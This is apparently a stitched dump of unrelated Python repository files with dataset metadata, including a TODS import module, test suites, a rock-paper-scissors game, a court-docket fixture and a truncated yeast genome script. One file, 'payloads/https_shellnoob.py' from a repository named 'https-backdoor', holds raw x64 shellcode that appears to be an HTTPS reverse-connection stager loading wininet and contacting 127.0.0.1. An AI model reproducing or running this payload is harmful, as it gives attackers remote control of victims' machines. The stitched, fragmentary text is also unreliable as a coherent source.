"Apache-2.0"
] | 86 | 2020-09-21T16:44:33.000Z | 2022-03-11T18:20:22.000Z | from .utils import *
from tods.data_processing import *
from tods.timeseries_processing import *
from tods.feature_analysis import *
from tods.detection_algorithm import *
from tods.sk_interface import *
| 29.142857 | 40 | 0.823529 | 28 | 204 | 5.821429 | 0.464286 | 0.306748 | 0.429448 | 0.294479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 204 | 6 | 41 | 34 | 0.905556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
959902586f82ecaade07d9198575cdcbb94f63ce | 3,160 | py | Python | payloads/https_shellnoob.py | zeralight/https-backdoor | 973e6db8a5d9cacbf7d3a56de10e0685092eb5ee | [
"Apache-2.0"
] | null | null | null | payloads/https_shellnoob.py | zeralight/https-backdoor | 973e6db8a5d9cacbf7d3a56de10e0685092eb5ee | [
"Apache-2.0"
] | null | null | null | payloads/https_shellnoob.py | zeralight/https-backdoor | 973e6db8a5d9cacbf7d3a56de10e0685092eb5ee | [
"Apache-2.0"
] | 1 | 2020-06-28T14:24:52.000Z | 2020-06-28T14:24:52.000Z | \xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x48\x31\xdb\x53\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x48\x89\xe1\x49\xc7\xc2\x4c\x77\x26\x07\xff\xd5\x53\x53\x48\x89\xe1\x53\x5a\x4d\x31\xc0\x4d\x31\xc9\x53\x53\x49\xba\x3a\x56\x79\xa7\x00\x00\x00\x00\xff\xd5\xe8\x0a\x00\x00\x00\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x5a\x48\x89\xc1\x49\xc7\xc0\xfb\x20\x00\x00\x4d\x31\xc9\x53\x53\x6a\x03\x53\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\xd5\xe8\xf1\x00\x00\x00\x2f\x6d\x72\x38\x77\x51\x59\x73\x6e\x4a\x45\x49\x4c\x4b\x67\x6f\x6f\x55\x4e\x75\x71\x4e\x51\x46\x52\x59\x62\x6c\x39\x71\x4d\x78\x53\x33\x53\x30\x63\x79\x37\x6c\x39\x64\x32\x47\x41\x6e\x65\x39\x57\x62\x42\x4e\x4a\x78\x59\x57\x33\x45\x57\x51\x35\x57\x6f\x79\x4b\x37\x38\x64\x4a\x59\x62\x4e\x62\x7a\x32\x31\x67\x4b\x6c\x4b\x53\x41\x76\x70\x79\x55\x66\x2d\x61\x5f\x72\x6c\x48\x71\x63\x59\x4f\x5a\x73\x30\x75\x64\x54\x59\x35\x58\x4d\x31\x4c\x69\x71\x77\x32\x43\x31\x4a\x43\x35\x6a\x62\x72\x74\x77\x76\x57\x6b\x44\x2d\x33\x43\x2d\x6a\x46\x65\x54\x66\x67\x78\x74\x43\x4f\x79\x54\x62\x41\x6c\x47\x63\x55\x68\x46\x39\x50\x49\x37\x52\x45\x4f\x51\x48\x57\x79\x78\x71\x78\x57\x45\x4f\x70\x39\x36\x5f\x32\x33\x6d\x4d\x47\x42\x47\x6a\x69\x2d\x42\x50\x36\x68\x44\x69\x69\x4b\x4a\x71\x30\x59\x4c\x5a\x6e\x54\x73\x65\x51\x6a\x42\x5f\x39\x46\x76\x59\x78\x73\x66\x6d\x72\x6d\x49\x79\x5a\x68\x6c\x6b\x59\x79\x64\x77\x68\x41\x6a\x34\x67\x45\x4a\x4c\x36\x78\x67\x4a\x61\x42\x72\x32\x00\x48\x89\xc1\x53\x5a\x41\x58\x4d\x31\xc9\x53\x48\xb8\x00\x32\xa0\x84\x00\x00\x00\x00\x50\x53\x53\x49\xc7\xc2\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x6a\x1f\x5a\x52\x68\x80\x33\x00\x00\x49\x89\xe0\x6a\x04\x41\x59\x49\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x4d\x31\xc0\x53\x5a\x48\x89\xf1\x4d\x31\xc9\x4d\x31\xc9\x53\x53\x49\xc7\xc2\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1f\x48\xc7\xc1\x88\x13\x00\x00\x49\xba\x44\xf0\x35\xe0\x00\x00\x00\x00\xff\xd5\x48\xff\xcf\x74\x02\xeb\xaa\xe8\x55\x00\x00\x00\x53\x59\x6a\x40\x5a\x49\x89\xd1\xc1\xe2\x10\x49\xc7\xc0\x00\x10\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\x00\x20\x00\x00\x49\x89\xf9\x49\xba\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb2\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd2\x58\xc3\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5 | 3,160 | 3,160 | 0.75 | 790 | 3,160 | 3 | 0.201266 | 0.096203 | 0.075949 | 0.035443 | 0.117722 | 0.102532 | 0.079747 | 0 | 0 | 0 | 0 | 0.400949 | 0 | 3,160 | 1 | 3,160 | 3,160 | 0.349051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
95a75dfa9df9160ae354a6cda7b8ebef0933b474 | 178 | py | Python | tests/utils/test_git.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
] | 5 | 2020-03-13T21:34:31.000Z | 2020-10-27T15:18:17.000Z | tests/utils/test_git.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
] | 2 | 2020-06-17T11:06:56.000Z | 2020-10-25T03:06:18.000Z | tests/utils/test_git.py | brentyi/hfdsajk | 2888aa5d969824ac1e1a528264674ece3f4703f9 | [
"MIT"
] | 4 | 2020-03-15T01:55:18.000Z | 2022-01-21T22:06:48.000Z | import fannypack
def test_get_git_commit_hash():
"""Checks that we can read this file's commit hash."""
assert len(fannypack.utils.get_git_commit_hash(__file__)) == 40
| 25.428571 | 67 | 0.741573 | 28 | 178 | 4.321429 | 0.714286 | 0.247934 | 0.198347 | 0.264463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013245 | 0.151685 | 178 | 6 | 68 | 29.666667 | 0.788079 | 0.269663 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
251d8ae7dce39faeba2f220043c476494f9d532b | 283 | py | Python | chainer_compiler/elichika/testtools/__init__.py | durswd/chainer-compiler | e9ca82b167c22d43f9577ce41c8d1ed9fd5d45ea | [
"MIT"
] | null | null | null | chainer_compiler/elichika/testtools/__init__.py | durswd/chainer-compiler | e9ca82b167c22d43f9577ce41c8d1ed9fd5d45ea | [
"MIT"
] | null | null | null | chainer_compiler/elichika/testtools/__init__.py | durswd/chainer-compiler | e9ca82b167c22d43f9577ce41c8d1ed9fd5d45ea | [
"MIT"
] | null | null | null | from chainer_compiler.elichika.testtools.testcasegen import generate_testcase
from chainer_compiler.elichika.testtools.canonicalizer_tools import compare_ast, assert_semantically_equals
from chainer_compiler.elichika.testtools.type_checker_tools import generate_id2type_from_forward
| 70.75 | 107 | 0.918728 | 35 | 283 | 7.057143 | 0.571429 | 0.133603 | 0.230769 | 0.327935 | 0.437247 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003704 | 0.045936 | 283 | 3 | 108 | 94.333333 | 0.911111 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c26a4622401dc7a12c8482e67c239170a04dacc5 | 4,541 | py | Python | spec/errors_in_hooks_spec.py | quiqueporta/mamba | 78da82be07e196d6c8f9c751e17e49ea23d39dcb | [
"MIT"
] | null | null | null | spec/errors_in_hooks_spec.py | quiqueporta/mamba | 78da82be07e196d6c8f9c751e17e49ea23d39dcb | [
"MIT"
] | null | null | null | spec/errors_in_hooks_spec.py | quiqueporta/mamba | 78da82be07e196d6c8f9c751e17e49ea23d39dcb | [
"MIT"
] | null | null | null | from expects import *
from doublex import *
from mamba import reporter
from spec.object_mother import *
with description('Errors in hooks'):
with before.each:
self.reporter = Spy(reporter.Reporter)
self.example_group = an_example_group()
with context('when an error was raised in a before.all hook'):
with before.each:
self.example_group.hooks['before_all'].append(self._error)
with it('marks example as failed'):
self.example = an_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(self.example.error).not_to(be_none)
with context('when example also launches an error'):
with context('when before.each also launches an error'):
with it('keeps the error happened in first hook'):
self.example_group.hooks['before_each'].append(self._other_error)
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)
with it('keeps the error happened in hook'):
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)
with context('when an error was raised in a before.each hook'):
with before.each:
self.example_group.hooks['before_each'].append(self._error)
with it('marks example as failed'):
self.example = an_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(self.example.error).not_to(be_none)
with context('when example also launches an error'):
with it('keeps the error happened in hook'):
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)
with context('when an error was raised in an after.each hook'):
with before.each:
self.example_group.hooks['after_each'].append(self._error)
with it('marks example as failed'):
self.example = an_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(self.example.error).not_to(be_none)
with context('when example also launches an error'):
with it('keeps the error happened in example'):
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, ValueError)).to(be_true)
with context('when an error was raised in an after.all hook'):
with before.each:
self.example_group.hooks['after_all'].append(self._error)
with it('marks example as failed'):
self.example = an_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(self.example.error).not_to(be_none)
with context('when example also launches an error'):
with context('when after.each also launches an error'):
with it('keeps the error happened in last hook'):
self.example_group.hooks['after_each'].append(self._other_error)
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)
with it('keeps the error happened in last hook'):
self.example = a_failing_example()
self.example_group.append(self.example)
self.example_group.run(self.reporter)
expect(isinstance(self.example.error.exception, NotImplementedError)).to(be_true)
def _error(self, *args):
raise NotImplementedError()
def _other_error(self, *args):
raise IOError()
| 37.221311 | 101 | 0.625193 | 546 | 4,541 | 5.058608 | 0.108059 | 0.227009 | 0.156408 | 0.166546 | 0.89428 | 0.892831 | 0.892831 | 0.892831 | 0.877625 | 0.80811 | 0 | 0 | 0.277472 | 4,541 | 121 | 102 | 37.528926 | 0.841817 | 0 | 0 | 0.682927 | 0 | 0 | 0.171328 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02439 | false | 0 | 0.04878 | 0 | 0.073171 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c2fc00742096f68aa40540eaa4a0038ee1f19787 | 1,662 | py | Python | rock&paper&scissors.py | supermangibi/Rock-Paper-Scissor | 7f1bb52077a603f86f073159ab7fba2bdc6fb2e0 | [
"MIT"
] | null | null | null | rock&paper&scissors.py | supermangibi/Rock-Paper-Scissor | 7f1bb52077a603f86f073159ab7fba2bdc6fb2e0 | [
"MIT"
] | null | null | null | rock&paper&scissors.py | supermangibi/Rock-Paper-Scissor | 7f1bb52077a603f86f073159ab7fba2bdc6fb2e0 | [
"MIT"
] | null | null | null | import random
rps = ["rock", "paper", "scissors"]
pc_choice = random.choice(rps)
user_choice = ""
def game():
user_choice = input("Rock/paper/scissors ?")
if user_choice.lower() == "rock" and pc_choice == "rock":
print("artificial intelligence's choice was: " + str(pc_choice))
print("even")
elif user_choice.lower() == "rock" and pc_choice == "paper":
print("artificial intelligence's choice was: " + str(pc_choice))
print("lose")
elif user_choice.lower() == "rock" and pc_choice == "scissors":
print("artificial intelligence's choice was: " + str(pc_choice))
print("win")
elif user_choice.lower() == "paper" and pc_choice == "rock":
print("artificial intelligence's choice was: " + str(pc_choice))
print("win")
elif user_choice.lower() == "paper" and pc_choice == "paper":
print("artificial intelligence's choice was: " + str(pc_choice))
print("even")
elif user_choice.lower() == "paper" and pc_choice == "scissors":
print("artificial intelligence's choice was: " + str(pc_choice))
print("lose")
elif user_choice.lower() == "scissors" and pc_choice == "rock":
print("artificial intelligence's choice was: " + str(pc_choice))
print("lose")
elif user_choice.lower() == "scissors" and pc_choice == "paper":
print("artificial intelligence's choice was: " + str(pc_choice))
print("win")
elif user_choice.lower() == "scissors" and pc_choice == "scissors":
print("artificial intelligence's choice was: " + str(pc_choice))
print("even")
game()
| 43.736842 | 73 | 0.612515 | 202 | 1,662 | 4.891089 | 0.123762 | 0.153846 | 0.13664 | 0.255061 | 0.888664 | 0.888664 | 0.888664 | 0.869433 | 0.848178 | 0.848178 | 0 | 0 | 0.233454 | 1,662 | 37 | 74 | 44.918919 | 0.77551 | 0 | 0 | 0.529412 | 0 | 0 | 0.316923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.029412 | false | 0 | 0.029412 | 0 | 0.058824 | 0.529412 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
6c2e2451367c0b91121054f4a22cb78d0033b527 | 5,925 | py | Python | grapher/alangrapher_utils_tests.py | tajmone/alan | b76a03eed8b567a130352bea4781203bcf693286 | [
"Artistic-2.0"
] | 12 | 2019-07-30T23:25:12.000Z | 2021-09-07T08:06:10.000Z | grapher/alangrapher_utils_tests.py | tajmone/alan | b76a03eed8b567a130352bea4781203bcf693286 | [
"Artistic-2.0"
] | 40 | 2019-08-01T09:12:47.000Z | 2022-01-09T18:09:51.000Z | grapher/alangrapher_utils_tests.py | tajmone/alan | b76a03eed8b567a130352bea4781203bcf693286 | [
"Artistic-2.0"
] | 2 | 2021-04-21T13:23:10.000Z | 2022-02-21T19:27:45.000Z | #!/usr/bin/env python
from xml.dom import minidom
import unittest
from alangrapher_utils import is_location, get_locations, get_exits, dot_for_location_header
class AlangrapherUtilsTests(unittest.TestCase):
def test_can_see_if_instance_is_location(self):
document = """<adventure>
<classes>
</classes>
<instances>
<instance NAME='loc1' PARENT='location'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
instance = xmltree.getElementsByTagName("instance")[0]
self.assertTrue(is_location(instance, []))
def test_can_see_if_instance_inherits_directly_from_class_inheriting_from_location(self):
document = """<adventure>
<classes>
<class NAME='location_class' PARENT='location'>
</class>
</classes>
<instances>
<instance NAME='loc1' PARENT='location_class'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
instance = xmltree.getElementsByTagName("instance")[0]
self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))
def test_can_see_if_instance_inherits_directly_from_class_inheriting_from_location_uppercase(self):
document = """<adventure>
<classes>
<class NAME='location_class' PARENT='LOCATION'>
</class>
</classes>
<instances>
<instance NAME='loc1' PARENT='location_class'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
instance = xmltree.getElementsByTagName("instance")[0]
self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))
def test_can_see_if_instance_inherits_indirectly_from_class_inheriting_from_location(self):
document = """<adventure>
<classes>
<class NAME='location_class_parent' PARENT='location'>
</class>
<class NAME='location_class' PARENT='location_class_parent'>
</class>
</classes>
<instances>
<instance NAME='loc1' PARENT='location_class'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
instance = xmltree.getElementsByTagName("instance")[0]
self.assertTrue(is_location(instance, xmltree.getElementsByTagName('class')))
def test_can_return_list_of_locations(self):
document = """<adventure>
<classes>
<class NAME='location_class_parent' PARENT='location'>
</class>
<class NAME='location_class' PARENT='location_class_parent'>
</class>
</classes>
<instances>
<instance NAME='loc1' PARENT='location_class'></instance>
<instance NAME='loc2' PARENT='location'></instance>
<instance NAME='loc3' PARENT='location_class_parent'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
self.assertEqual(3, len(get_locations(xmltree, [])))
def test_can_return_list_of_locations_ignoring_some(self):
document = """<adventure>
<classes>
<class NAME='location_class_parent' PARENT='location'>
</class>
<class NAME='location_class' PARENT='location_class_parent'>
</class>
</classes>
<instances>
<instance NAME='loc1' PARENT='location_class'></instance>
<instance NAME='loc2' PARENT='location'></instance>
<instance NAME='loc3' PARENT='location_class_parent'></instance>
</instances>
</adventure>"""
xmltree = minidom.parseString(document)
self.assertEqual(2, len(get_locations(xmltree, ['loc1'])))
def test_can_find_exits_in_location_instance(self):
document = """<adventure>
<instances>
<instance NAME='loc1' PARENT='location'>
<exit DIRECTION='e' TARGET='loc2'></exit>
<exit DIRECTION='w' TARGET='loc3' />
</instance>
</instances>
</adventure>"""
location = get_locations(minidom.parseString(document), [])[0]
self.assertEqual(2, len(get_exits(location, [])))
def test_can_create_header_for_location(self):
document = """<adventure>
<instances>
<instance NAME='loc1' PARENT='location'>
<exit DIRECTION='e' TARGET='loc1'></exit>
</instance>
</instances>
</adventure>"""
location = get_locations(minidom.parseString(document), [])[0]
self.assertEqual('loc1 [label="loc1"];', dot_for_location_header(location, start_location))
if __name__ == 'main':
unittest.main()
| 47.4 | 103 | 0.507848 | 457 | 5,925 | 6.33698 | 0.150985 | 0.103246 | 0.098412 | 0.069061 | 0.84634 | 0.829075 | 0.821133 | 0.787293 | 0.787293 | 0.787293 | 0 | 0.007418 | 0.385654 | 5,925 | 124 | 104 | 47.782258 | 0.788187 | 0.003376 | 0 | 0.774775 | 0 | 0 | 0.623306 | 0.113482 | 0 | 0 | 0 | 0 | 0.072072 | 1 | 0.072072 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6c3cc6abbbb3582c127b6158f85fd6eca04b98fe | 2,618 | py | Python | tests/fixtures/dict_list/docket_list_with_duplicates.py | SimmonsRitchie/court_docket_scraper | f467d59c4ea8dbddb4fd7545dc36656a4b30e46d | [
"MIT"
] | 1 | 2021-10-29T20:12:44.000Z | 2021-10-29T20:12:44.000Z | tests/fixtures/dict_list/docket_list_with_duplicates.py | SimmonsRitchie/court_docket_scraper | f467d59c4ea8dbddb4fd7545dc36656a4b30e46d | [
"MIT"
] | 2 | 2019-07-19T20:13:16.000Z | 2019-07-19T20:13:16.000Z | tests/fixtures/dict_list/docket_list_with_duplicates.py | SimmonsRitchie/court_docket_scraper | f467d59c4ea8dbddb4fd7545dc36656a4b30e46d | [
"MIT"
] | null | null | null | docket_list = [
{
"county": "Dauphin",
"docketnum": 1,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
{
"county": "Dauphin",
"docketnum": 1,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
{
"county": "Dauphin",
"docketnum": 1,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
{
"county": "Dauphin",
"docketnum": 1234,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
{
"county": "Dauphin",
"docketnum": 12345,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
{
"county": "Dauphin",
"docketnum": 123456,
"caption": "Commonwealth V. Smith, John A.",
"dob": "01/01/1986",
"filing_date": "03/03/2019",
"charges": "Receiving Stolen Property; Driving W/O A License; "
"homicide",
"bail": 25000,
"url": "https://ujsportal.pacourts.us/DocketSheets/MDJReport.ashx?docketNumber=MJ-12302-CR-0000110-2019&dnh=zj8BkxXzkOi23xMzscQ6hw%3d%3d",
},
]
| 40.90625 | 146 | 0.589381 | 291 | 2,618 | 5.278351 | 0.168385 | 0.050781 | 0.085938 | 0.097656 | 0.978516 | 0.978516 | 0.978516 | 0.978516 | 0.978516 | 0.978516 | 0 | 0.138485 | 0.238732 | 2,618 | 63 | 147 | 41.555556 | 0.632213 | 0 | 0 | 0.698413 | 0 | 0.095238 | 0.652406 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6c49e2023f4531e993a032c61a41b0bb2df022c0 | 7,108 | py | Python | scenarios/YeastShufflingEvents.py | 865699871/IAGS_version1.0 | f5b2f30cef9b809a9ece91abf5b1d56367512f58 | [
"AFL-1.1"
] | 5 | 2021-08-04T07:38:04.000Z | 2022-03-07T16:56:57.000Z | scenarios/YeastShufflingEvents.py | xjtu-omics/IAGS | 1e9de501e1f7875e0cea6da5954aa034445eae77 | [
"AFL-1.1"
] | null | null | null | scenarios/YeastShufflingEvents.py | xjtu-omics/IAGS | 1e9de501e1f7875e0cea6da5954aa034445eae77 | [
"AFL-1.1"
] | 2 | 2022-03-03T03:10:01.000Z | 2022-03-28T01:49:19.000Z | from util.calculateFissionsAndFusions import calculateFissionAndFussions
"""
Calculating Fissions and Fusions for Yeast in evolution history.
result in outdutdata/Yeast
"""
path = 'D:/InferAncestorGenome/realData'
outfile = path + '/IAGS_version1.0/outputdata/Yeast/shufflingEvents.txt'
outfile = open(outfile,'w')
"""
preWGD yeast -> N. castellii
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Ncastellii.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 2
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> N. castellii\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> S. cerevisiae
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Scerevisiae.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 2
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> S. cerevisiae\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> K. naganishii
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Knaganishii.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 2
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> K. naganishii\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> Z. rouxii
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Zrouxii.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
ancestor_copy_number = 1
fissions,fusions = calculateFissionAndFussions(descendant_file,ancestor_file,
descendant_copy_number,ancestor_copy_number,
ancestor_block_sequence_dir)
outfile.write('preWGD yeast -> Z. rouxii\n' +
'fissions: '+ str(fissions)+'\t' + 'fusions: '+str(fusions)+'\n')
"""
preWGD yeast -> L. kluyveri
"""
species_block_sequence_dir = path + '/IAGS_version1.0/inputdata/Yeast/'
ancestor_block_sequence_dir = path + '/IAGS_version1.0/outputdata/Yeast/'
descendant_file = species_block_sequence_dir + 'Lkluyveri.final.block'
ancestor_file = ancestor_block_sequence_dir + 'preWGD_yeast.block'
descendant_copy_number = 1
